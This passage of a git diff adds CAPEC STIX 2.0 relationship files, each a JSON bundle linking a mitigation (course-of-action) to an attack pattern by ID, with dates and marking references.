"course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767", + "target_ref": "attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c.json b/capec/relationship/relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c.json new file mode 100644 index 0000000000..e1bdfdf469 --- /dev/null +++ b/capec/relationship/relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8091de43-23cb-4ea4-b892-76cfbfd79a3a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7.json b/capec/relationship/relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7.json new file mode 100644 index 0000000000..3dc5d0e99c --- /dev/null +++ b/capec/relationship/relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4781855c-cfc4-40bd-8c8d-92b676779833", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38", + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6a141e8c-c70f-4f85-89b8-3f0a77d80c2f.json b/capec/relationship/relationship--6a141e8c-c70f-4f85-89b8-3f0a77d80c2f.json new file mode 100644 index 0000000000..43d6eadaf5 --- /dev/null +++ b/capec/relationship/relationship--6a141e8c-c70f-4f85-89b8-3f0a77d80c2f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4d94b3fb-f079-41bb-964a-aa2b72cfb173", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6a141e8c-c70f-4f85-89b8-3f0a77d80c2f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6a653502-0dc6-426f-b012-d0f688848013.json b/capec/relationship/relationship--6a653502-0dc6-426f-b012-d0f688848013.json new file mode 100644 index 0000000000..0e2586acfc --- /dev/null +++ b/capec/relationship/relationship--6a653502-0dc6-426f-b012-d0f688848013.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2a66aaa9-eef2-4534-a424-e20df628f6cf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6a653502-0dc6-426f-b012-d0f688848013", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace.json b/capec/relationship/relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace.json new file mode 100644 index 0000000000..a6fbf66bf3 --- /dev/null +++ b/capec/relationship/relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--20f58b19-3ebd-427f-87a6-8a848fcf98b2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4", + "target_ref": "attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb.json b/capec/relationship/relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb.json new file mode 100644 index 0000000000..7fb431cdef --- /dev/null +++ b/capec/relationship/relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dc0e6d69-6784-4299-b20f-b1bcb9de7510", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6b435bc5-7cc5-4045-a4e5-1f56197cf9d7.json b/capec/relationship/relationship--6b435bc5-7cc5-4045-a4e5-1f56197cf9d7.json new file mode 100644 index 0000000000..3479336554 --- /dev/null +++ b/capec/relationship/relationship--6b435bc5-7cc5-4045-a4e5-1f56197cf9d7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c9fd8abb-5e54-4e25-893b-3c66d13c7c2a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6b435bc5-7cc5-4045-a4e5-1f56197cf9d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", + "target_ref": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2.json b/capec/relationship/relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2.json new file mode 100644 index 0000000000..a1f43029ee --- /dev/null +++ b/capec/relationship/relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--88b497b2-2795-4152-a733-f287f486918c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8", + "target_ref": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760.json b/capec/relationship/relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760.json new file mode 100644 index 0000000000..af67f8f25a --- /dev/null +++ b/capec/relationship/relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--22f09f60-a9f1-44db-bd9a-2e50c371122d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4", + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1.json b/capec/relationship/relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1.json new file mode 100644 index 0000000000..09f1da2b28 --- /dev/null +++ b/capec/relationship/relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--99e94b6e-a59e-4fe4-bf29-ef0f1c24c2ca", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad", + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6cf9642e-3760-492e-a5eb-edd19b425bed.json b/capec/relationship/relationship--6cf9642e-3760-492e-a5eb-edd19b425bed.json new file mode 100644 index 0000000000..5000e14a47 --- /dev/null +++ b/capec/relationship/relationship--6cf9642e-3760-492e-a5eb-edd19b425bed.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b9af16bc-f953-44b8-a2bc-88a94b91dda4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6cf9642e-3760-492e-a5eb-edd19b425bed", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917", + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6d02d356-8564-4b5a-8b9f-04e35159b6f4.json b/capec/relationship/relationship--6d02d356-8564-4b5a-8b9f-04e35159b6f4.json new file mode 100644 index 0000000000..7f8f11f49b --- /dev/null +++ b/capec/relationship/relationship--6d02d356-8564-4b5a-8b9f-04e35159b6f4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--72ef484c-8fd8-475c-a3f0-c5f58248198d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6d02d356-8564-4b5a-8b9f-04e35159b6f4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa", + "target_ref": "attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a.json b/capec/relationship/relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a.json new file mode 100644 index 0000000000..aba369a1d7 --- /dev/null +++ b/capec/relationship/relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--14a8e344-8cef-4fff-9b62-3401027654b3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6d7779a9-9fec-4629-89f3-362abf58e61b.json b/capec/relationship/relationship--6d7779a9-9fec-4629-89f3-362abf58e61b.json new file mode 100644 index 0000000000..f5bf4174fd --- /dev/null +++ b/capec/relationship/relationship--6d7779a9-9fec-4629-89f3-362abf58e61b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c93622dd-2c4a-4343-b0e4-876952a4df0e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6d7779a9-9fec-4629-89f3-362abf58e61b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64", + "target_ref": "attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6de37d0b-529b-4543-b787-6b4ed9f22a78.json b/capec/relationship/relationship--6de37d0b-529b-4543-b787-6b4ed9f22a78.json new file mode 100644 index 0000000000..6fe145ebb3 --- /dev/null +++ b/capec/relationship/relationship--6de37d0b-529b-4543-b787-6b4ed9f22a78.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0e8bac82-5e09-476d-8654-d72d20c1cf56", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6de37d0b-529b-4543-b787-6b4ed9f22a78", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef", + "target_ref": "attack-pattern--8610c5ec-7ab2-4f7c-938c-3dc86c0f2b91", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6e058add-0fcc-4179-8dd4-ae39c312b021.json b/capec/relationship/relationship--6e058add-0fcc-4179-8dd4-ae39c312b021.json new file mode 100644 index 0000000000..137137a6f1 --- /dev/null +++ b/capec/relationship/relationship--6e058add-0fcc-4179-8dd4-ae39c312b021.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fea03d9f-229b-44f5-9754-de3d2b4edc3c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6e058add-0fcc-4179-8dd4-ae39c312b021", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6ee48691-05c7-4a67-9070-4b6df955f667.json b/capec/relationship/relationship--6ee48691-05c7-4a67-9070-4b6df955f667.json new file mode 100644 index 0000000000..8f1446cde1 --- /dev/null +++ b/capec/relationship/relationship--6ee48691-05c7-4a67-9070-4b6df955f667.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--543cfc45-a261-41a4-a5c7-b0da0da47c53", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6ee48691-05c7-4a67-9070-4b6df955f667", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb", + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6ee91915-2256-49b8-93ac-fc6841d2fe3c.json b/capec/relationship/relationship--6ee91915-2256-49b8-93ac-fc6841d2fe3c.json new file mode 100644 index 0000000000..90cfe60b50 --- /dev/null +++ b/capec/relationship/relationship--6ee91915-2256-49b8-93ac-fc6841d2fe3c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8adfd4b1-e996-4930-9b1f-094cd468b005", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6ee91915-2256-49b8-93ac-fc6841d2fe3c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a", + "target_ref": "attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce.json b/capec/relationship/relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce.json new file mode 100644 index 0000000000..ba120f9c2b --- /dev/null +++ b/capec/relationship/relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8afd6895-8a78-491b-9200-5f55e66be62b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce", + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7003f3ca-4461-4a85-9f24-14ad95f139a6.json b/capec/relationship/relationship--7003f3ca-4461-4a85-9f24-14ad95f139a6.json new file mode 100644 index 0000000000..3ae3f60166 --- /dev/null +++ b/capec/relationship/relationship--7003f3ca-4461-4a85-9f24-14ad95f139a6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c93418f2-4773-4e0f-8cc5-8ad9151e7fd3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7003f3ca-4461-4a85-9f24-14ad95f139a6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e", + "target_ref": "attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--70558577-9185-4fbc-9786-d7f780a06eb8.json b/capec/relationship/relationship--70558577-9185-4fbc-9786-d7f780a06eb8.json new file mode 100644 index 0000000000..768742defe --- /dev/null +++ b/capec/relationship/relationship--70558577-9185-4fbc-9786-d7f780a06eb8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--99ff20a6-50c1-4fd5-9a48-a657f37ccfa2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--70558577-9185-4fbc-9786-d7f780a06eb8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0", + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81.json b/capec/relationship/relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81.json new file mode 100644 index 0000000000..5fc3af505d --- /dev/null +++ b/capec/relationship/relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8573b0e9-80af-4125-989d-75dedc7bc359", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf", + "target_ref": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0.json b/capec/relationship/relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0.json new file mode 100644 index 0000000000..cc47511c1c --- /dev/null +++ b/capec/relationship/relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--19bab81b-22ec-43ef-9cd3-f2234e7decf5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--70942835-b3bd-4245-9d50-cf8ca769df0a.json b/capec/relationship/relationship--70942835-b3bd-4245-9d50-cf8ca769df0a.json new file mode 100644 index 0000000000..a866dba685 --- /dev/null +++ b/capec/relationship/relationship--70942835-b3bd-4245-9d50-cf8ca769df0a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--48c8414b-6886-40a2-a9b1-0442144085ce", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--70942835-b3bd-4245-9d50-cf8ca769df0a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f", + "target_ref": "attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--71334766-978c-4e8f-a180-9ead3475238b.json b/capec/relationship/relationship--71334766-978c-4e8f-a180-9ead3475238b.json new file mode 100644 index 0000000000..28d0233c39 --- /dev/null +++ b/capec/relationship/relationship--71334766-978c-4e8f-a180-9ead3475238b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--61fe569f-9776-40d3-ad97-fcfbfbff2e15", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--71334766-978c-4e8f-a180-9ead3475238b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444", + "target_ref": "attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--71cbc1fb-b816-4bbd-9c64-dd988f3fcf00.json b/capec/relationship/relationship--71cbc1fb-b816-4bbd-9c64-dd988f3fcf00.json new file mode 100644 index 0000000000..e06082194d --- /dev/null +++ b/capec/relationship/relationship--71cbc1fb-b816-4bbd-9c64-dd988f3fcf00.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a8d6b162-c3b8-45b8-8536-bbc2b990b0a1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--71cbc1fb-b816-4bbd-9c64-dd988f3fcf00", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12", + "target_ref": "attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88.json b/capec/relationship/relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88.json new file mode 100644 index 0000000000..ca2706f71e --- /dev/null +++ b/capec/relationship/relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--82a27d5d-c7a9-458b-978f-d2dba419bd15", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e", + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7.json b/capec/relationship/relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7.json new file mode 100644 index 0000000000..cbf4c07690 --- /dev/null +++ b/capec/relationship/relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c3b20488-69f1-4e6f-b763-822ebac7d8de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7", + "created_by_ref": 